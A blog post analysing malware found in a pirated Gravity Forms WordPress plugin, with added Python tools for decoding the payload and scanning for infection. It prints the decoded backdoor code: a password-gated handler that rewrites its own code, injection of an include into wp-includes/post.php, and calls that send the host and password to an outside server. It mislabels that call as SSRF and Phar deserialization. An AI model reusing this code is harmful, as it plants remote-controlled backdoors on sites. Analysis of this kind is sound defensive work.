
【WordPress Security】Never install plugins from unknown sources! A real case study

Last updated: July 26, 2019

Recently someone asked me whether a paid plugin, Gravity Forms, obtained from an unknown source could safely be installed. I took a look at the code and found a spectacular case!

This article analyses just how dangerous plugins from unknown sources are …


Unpacking the plugin archive

Step 1

One day someone handed me a free copy of Gravity Forms. Having studied information security, I naturally keep my guard a little higher, so I opened the folder to take a look.

Once it was open, wow! It looked genuine: the file names were all form-this and form-that.

(Screenshot: the folder looks normal)

Step 2

But if you have sharp eyes, did you notice? One file looks odd: its date differs from all the others, and it is called class.plugin-modules.php.

(Screenshot: the odd file)

Step 3

Next I looked at another folder, Add-Ons, and there was also a very suspicious website in there.

(Screenshot: looking at Add-Ons)

Step 4

Opening it, strange: there were lots of odd folders.

(Screenshot: the directory looks strange)

Step 5

I picked ForGravity and opened it, and saw lots of compressed archives.

(Screenshot: opening ForGravity)

Step 6

I opened an archive at random and, sure enough, the same file again: class.plugin-modules.php.

(Screenshot: the same odd file again)

The other folders were much the same, so next let's analyse this file.


Code analysis

First, the source can be viewed here: https://www.unphp.net/decode/3741be1e37a3ecaef32db9a43c0ea0e4/

That site is not malicious, feel free to use it!

Step 1

Right from the start the first block means no good: it turns off PHP error reporting, then defines a few constants.


//install_code1
error_reporting(0);
ini_set('display_errors', 0);
//kNRa0pDUWw3Q2drSkNRa0pD
DEFINE('MAX_LEVEL', 2);
//mVWtWUlZVVlRWRnNuWVdOMGF
DEFINE('MAX_ITERATION', 50);
//NBZ0lDQWdJQ0
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
//Q0FnSUNBZ0lDQWdJQ0FnS

Step 2

Next you can see it defines a long bizarre string; the trailing = gives it away, so I took it straight to a Base64 decoder.


$GLOBALS['WP_CD_CODE'] = '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';


Step 3

After the Base64 decode, it is another chunk of PHP code.

Taking the top three lines, I found yet another Base64 string; the two lines after it decode that string and substitute the install password into it.

So I first took $install_code and decoded it to see what it actually looks like.


$install_code = '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';

$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

Step 4

This time the decode is finally complete and we get the bottom-most layer of code. Let's go through the first part.

Put simply, it plants two functions on your site: one that changes the domain (the change_domain action) and one that changes the code the attacker uploaded (the change_code action). Both require the password computed from your host name and AUTH_SALT.


if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            // Rewrites the hard-coded remote domain inside this very file
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        case 'change_code';
            // Replaces everything between the start/end markers with attacker-supplied code
            if (isset($_REQUEST['newcode'])) {
                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}
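To repeat steps 2 to 4 without pasting each string into a website by hand, here is an added Python example (not from the original post or the plugin) that peels the nested Base64 literals one layer at a time and lists which of the strings seen above appear at each layer. The three-layer sample it decodes is constructed here to mirror the stager, the installer and the password-protected backdoor; the length threshold and layer bound are assumptions.

```python
import base64
import re

# Base64 literals at least this long are treated as candidate payloads; the
# threshold and the layer bound are assumptions made for this example.
MIN_B64_LEN = 40
MAX_LAYERS = 5
B64_RE = re.compile(r"'([A-Za-z0-9+/]{%d,}={0,2})'" % MIN_B64_LEN)
# Strings from the decoded backdoor on this page that mark each layer.
INDICATORS = ("wp_vcd", "wp-vcd.php", "change_domain", "change_code",
              "file_put_contents(__FILE__", "{$PASSWORD}", "error_reporting(0)")


def decode_layers(src, max_layers=MAX_LAYERS):
    """Return [source, decode 1, decode 2, ...] by peeling one literal per layer."""
    layers = [src]
    for _ in range(max_layers):
        match = B64_RE.search(layers[-1])
        if not match:
            break
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break  # not Base64 text (e.g. an encrypted blob): stop peeling here
        layers.append(decoded)
    return layers


def indicators_in(text):
    """Indicator strings present in one layer, in INDICATORS order."""
    return [s for s in INDICATORS if s in text]


# Constructed three-layer sample mirroring the post: a stager that decodes an
# installer, which in turn decodes the password-protected backdoor.
INNER = ("if (isset($_REQUEST['action']) && $_REQUEST['password'] == '{$PASSWORD}') {\n"
         "    $div_code_name = \"wp_vcd\"; // change_domain / change_code switch\n}\n")
MIDDLE = ("$install_code = '%s';\n"
          "$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);\n"
          "$install_code = str_replace('{$PASSWORD}', $install_hash, base64_decode($install_code));\n"
          ) % base64.b64encode(INNER.encode()).decode()
SAMPLE = ("error_reporting(0);\nini_set('display_errors', 0);\n"
          "$GLOBALS['WP_CD_CODE'] = '%s';\n") % base64.b64encode(MIDDLE.encode()).decode()

if __name__ == "__main__":
    for depth, layer in enumerate(decode_layers(SAMPLE)):
        print(depth, indicators_in(layer))
```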

Step 5

Now back to the original class.plugin-modules.php, to look at the code further down.

This part drops a file called wp-vcd.php into your wp-includes folder, and prepends an include of it to wp-includes/post.php so that it is loaded on every request.


function WP_URL_CD($path)
{
    // Write the decoded payload as wp-includes/wp-vcd.php, then hook it into core
    if (($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE'])))) {
        if (strpos($file, 'wp-vcd') === false) {
            // Prepend an include_once of wp-vcd.php to wp-includes/post.php
            $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
            file_put_contents($path . '/wp-includes/post.php', $file);
            //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));
        }
    }
}

Step 6

Further down, the code also uses SSRF attacks and a Phar deserialization technique.


if ($ping) {
    // Reports the infected host name and its install password to the remote server
    $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
    //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));
    //echo ABSPATH . 'wp-includes/class.wp.php';
}

if ($ping2) {
    $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
    //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));
    //echo ABSPATH . 'wp-includes/class.wp.php';
}
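Since step 5 shows exactly which files the installer writes and which core file it patches, here is an added Python example (not from the post or the plugin) that checks a WordPress tree for those traces: the dropped wp-includes/wp-vcd.php or class.wp.php, a wp-vcd include prepended to wp-includes/post.php, and plugin files named class.plugin-modules.php or carrying the stager's error_reporting(0) plus $GLOBALS['WP_CD_CODE'] combination. The sample tree it builds in a temp directory is constructed for the example.

```python
import os
import tempfile

# Names and strings this post associates with the trojanised plugin; the
# sample tree below is constructed for this example, not taken from a real site.
DROPPED_FILES = ("wp-includes/wp-vcd.php", "wp-includes/class.wp.php")
INSTALLER_NAME = "class.plugin-modules.php"
STAGER_MARKERS = ("error_reporting(0)", "$GLOBALS['WP_CD_CODE']")


def scan_wordpress_root(root):
    """Return sorted (finding, relative_path) pairs for the indicators above."""
    findings = []
    for rel in DROPPED_FILES:  # loader files the installer writes into wp-includes
        if os.path.isfile(os.path.join(root, rel)):
            findings.append(("dropped_file", rel))
    post = os.path.join(root, "wp-includes", "post.php")
    if os.path.isfile(post):  # the include is prepended, so the file head suffices
        with open(post, encoding="utf-8", errors="replace") as fh:
            if "wp-vcd" in fh.read(4096):
                findings.append(("patched_post_php", "wp-includes/post.php"))
    for dirpath, _, names in os.walk(os.path.join(root, "wp-content", "plugins")):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == INSTALLER_NAME:
                findings.append(("installer_name", rel))
            if name.endswith(".php"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    head = fh.read(65536)
                if all(marker in head for marker in STAGER_MARKERS):
                    findings.append(("stager_markers", rel))
    return sorted(findings)


def build_sample_tree():
    """Write a constructed, partly infected WordPress layout to a temp dir."""
    root = tempfile.mkdtemp()
    files = {
        "wp-includes/post.php": "<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?php\n/**\n",
        "wp-includes/wp-vcd.php": "<?php // dropped loader\n",
        "wp-content/plugins/gravityforms/class.plugin-modules.php":
            "<?php\nerror_reporting(0);\nini_set('display_errors', 0);\n$GLOBALS['WP_CD_CODE'] = 'QUJD';\n",
        "wp-content/plugins/gravityforms/gravityforms.php": "<?php\n// clean plugin entry file\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

On a real site, compare wp-includes/post.php against a clean copy of the same WordPress version as well, since the scan only looks for the marker string this sample uses.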


Conclusion

A plugin like this does no harm at the moment you upload it; the damage happens the moment you activate it.

Basically, as soon as it is activated, your site's directory structure is altered with a lot of strange extra files, your domain may get swapped, your server may be used to attack others, and so on.

Three key points

1. Don't install plugins from unknown sources!

2. Support genuine, official copies!

3. Make regular backups a habit!

by Johntool (工具王阿璋)